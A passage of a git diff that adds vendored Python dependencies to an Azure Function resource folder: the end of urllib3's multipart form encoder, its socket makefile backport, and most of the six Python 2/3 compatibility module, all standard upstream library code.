+ else: + yield RequestField.from_tuples(*field) + + +def iter_fields(fields): + """ + .. deprecated:: 1.6 + + Iterate over fields. + + The addition of :class:`~urllib3.fields.RequestField` makes this function + obsolete. Instead, use :func:`iter_field_objects`, which returns + :class:`~urllib3.fields.RequestField` objects. + + Supports list of (k, v) tuples and dicts. + """ + if isinstance(fields, dict): + return ((k, v) for k, v in six.iteritems(fields)) + + return ((k, v) for k, v in fields) + + +def encode_multipart_formdata(fields, boundary=None): + """ + Encode a dictionary of ``fields`` using the multipart/form-data MIME format. + + :param fields: + Dictionary of fields or list of (key, :class:`~urllib3.fields.RequestField`). + + :param boundary: + If not specified, then a random boundary will be generated using + :func:`urllib3.filepost.choose_boundary`. 
+ """ + body = BytesIO() + if boundary is None: + boundary = choose_boundary() + + for field in iter_field_objects(fields): + body.write(b("--%s\r\n" % (boundary))) + + writer(body).write(field.render_headers()) + data = field.data + + if isinstance(data, int): + data = str(data) # Backwards compatibility + + if isinstance(data, six.text_type): + writer(body).write(data) + else: + body.write(data) + + body.write(b"\r\n") + + body.write(b("--%s--\r\n" % (boundary))) + + content_type = str("multipart/form-data; boundary=%s" % boundary) + + return body.getvalue(), content_type diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..7af643f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc new file mode 100644 index 0000000..0882c4f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..53a41ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc new file mode 100644 index 0000000..86340e2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py new file mode 100644 index 0000000..6a5b072 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py @@ -0,0 +1,51 @@ +# -*- coding: utf-8 -*- +""" +backports.makefile +~~~~~~~~~~~~~~~~~~ + +Backports the Python 3 ``socket.makefile`` method for use with anything that +wants to create a "fake" socket object. +""" +import io +from socket import SocketIO + + +def backport_makefile( + self, mode="r", buffering=None, encoding=None, errors=None, newline=None +): + """ + Backport of ``socket.makefile`` from Python 3.5. + """ + if not set(mode) <= {"r", "w", "b"}: + raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)) + writing = "w" in mode + reading = "r" in mode or not writing + assert reading or writing + binary = "b" in mode + rawmode = "" + if reading: + rawmode += "r" + if writing: + rawmode += "w" + raw = SocketIO(self, rawmode) + self._makefile_refs += 1 + if buffering is None: + buffering = -1 + if buffering < 0: + buffering = io.DEFAULT_BUFFER_SIZE + if buffering == 0: + if not binary: + raise ValueError("unbuffered streams must be binary") + return raw + if reading and writing: + buffer = io.BufferedRWPair(raw, raw, buffering) + elif reading: + buffer = io.BufferedReader(raw, buffering) + else: + assert writing + buffer = io.BufferedWriter(raw, buffering) + if binary: + return buffer + text = io.TextIOWrapper(buffer, encoding, errors, newline) + text.mode = mode + return text diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py new file mode 100644 index 0000000..af538d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py @@ -0,0 +1,1077 @@ +# Copyright (c) 2010-2020 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.16.0" + + +# Useful for very coarse version differentiation. 
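+# (Editor's note, illustrative: on CPython 3.9 the flags below evaluate to
+# PY2 == False, PY3 == True, PY34 == True.)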
+PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = (str,) + integer_types = (int,) + class_types = (type,) + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = (basestring,) + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + def __len__(self): + return 1 << 31 + + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." 
+ fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute( + "filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse" + ), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute( + "reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload" + ), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute( + "zip_longest", "itertools", "itertools", "izip_longest", "zip_longest" + ), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule( + "collections_abc", + "collections", + "collections.abc" if sys.version_info >= (3, 3) else "collections", + ), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule( + "_dummy_thread", + "dummy_thread", + "_dummy_thread" if sys.version_info < (3, 9) else "_thread", + ), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), 
+ MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule( + "email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart" + ), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." 
+ attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute( + "unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes" + ), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", + "moves.urllib.parse", +) + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", + "moves.urllib.error", +) + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + 
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", + "moves.urllib.request", +) + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", + "moves.urllib.response", +) + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = ( + _urllib_robotparser_moved_attributes +) + +_importer._add_module( + Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + 
"moves.urllib_robotparser", + "moves.urllib.robotparser", +) + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ["parse", "error", "request", "response", "robotparser"] + + +_importer._add_module( + Module_six_moves_urllib(__name__ + ".moves.urllib"), "moves.urllib" +) + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + + def advance_iterator(it): + return it.next() + + +next = advance_iterator + + +try: + callable = callable +except NameError: + + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc( + get_unbound_function, """Get the function out of a possibly unbound function""" +) + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return 
an iterator over the values of a dictionary.") +_add_doc(iteritems, "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc( + iterlists, "Return an iterator over the (key, [values]) pairs of a dictionary." +) + + +if PY3: + + def b(s): + return s.encode("latin-1") + + def u(s): + return s + + unichr = chr + import struct + + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + + def b(s): + return s + + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r"\\", r"\\\\"), "unicode_escape") + + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + + +else: + + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec ("""exec _code_ in _globs_, _locs_""") + + exec_( + """def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""" + ) + + +if sys.version_info[:2] > (3,): + exec_( + """def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""" + ) +else: + + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. 
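+            # NOTE (illustrative; not part of upstream six): this branch only
+            # runs on Python 2, where ``file`` and ``unicode`` are builtins.
+            # For example, sys.stdout attached to a UTF-8 terminal reports
+            # fp.encoding == "UTF-8", so unicode arguments are encoded with
+            # it before being written.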
+            if (
+                isinstance(fp, file)
+                and isinstance(data, unicode)
+                and fp.encoding is not None
+            ):
+                errors = getattr(fp, "errors", None)
+                if errors is None:
+                    errors = "strict"
+                data = data.encode(fp.encoding, errors)
+            fp.write(data)
+
+        want_unicode = False
+        sep = kwargs.pop("sep", None)
+        if sep is not None:
+            if isinstance(sep, unicode):
+                want_unicode = True
+            elif not isinstance(sep, str):
+                raise TypeError("sep must be None or a string")
+        end = kwargs.pop("end", None)
+        if end is not None:
+            if isinstance(end, unicode):
+                want_unicode = True
+            elif not isinstance(end, str):
+                raise TypeError("end must be None or a string")
+        if kwargs:
+            raise TypeError("invalid keyword arguments to print()")
+        if not want_unicode:
+            for arg in args:
+                if isinstance(arg, unicode):
+                    want_unicode = True
+                    break
+        if want_unicode:
+            newline = unicode("\n")
+            space = unicode(" ")
+        else:
+            newline = "\n"
+            space = " "
+        if sep is None:
+            sep = space
+        if end is None:
+            end = newline
+        for i, arg in enumerate(args):
+            if i:
+                write(sep)
+            write(arg)
+        write(end)
+
+
+if sys.version_info[:2] < (3, 3):
+    _print = print_
+
+    def print_(*args, **kwargs):
+        fp = kwargs.get("file", sys.stdout)
+        flush = kwargs.pop("flush", False)
+        _print(*args, **kwargs)
+        if flush and fp is not None:
+            fp.flush()
+
+
+_add_doc(reraise, """Reraise an exception.""")
+
+if sys.version_info[0:2] < (3, 4):
+    # This does exactly what the :func:`py3:functools.update_wrapper`
+    # function does on Python versions after 3.2. It sets the ``__wrapped__``
+    # attribute on the ``wrapper`` object and it doesn't raise an error if any
+    # of the attributes mentioned in ``assigned`` and ``updated`` are missing
+    # on the ``wrapped`` object.
+    def _update_wrapper(
+        wrapper,
+        wrapped,
+        assigned=functools.WRAPPER_ASSIGNMENTS,
+        updated=functools.WRAPPER_UPDATES,
+    ):
+        for attr in assigned:
+            try:
+                value = getattr(wrapped, attr)
+            except AttributeError:
+                continue
+            else:
+                setattr(wrapper, attr, value)
+        for attr in updated:
+            getattr(wrapper, attr).update(getattr(wrapped, attr, {}))
+        wrapper.__wrapped__ = wrapped
+        return wrapper
+
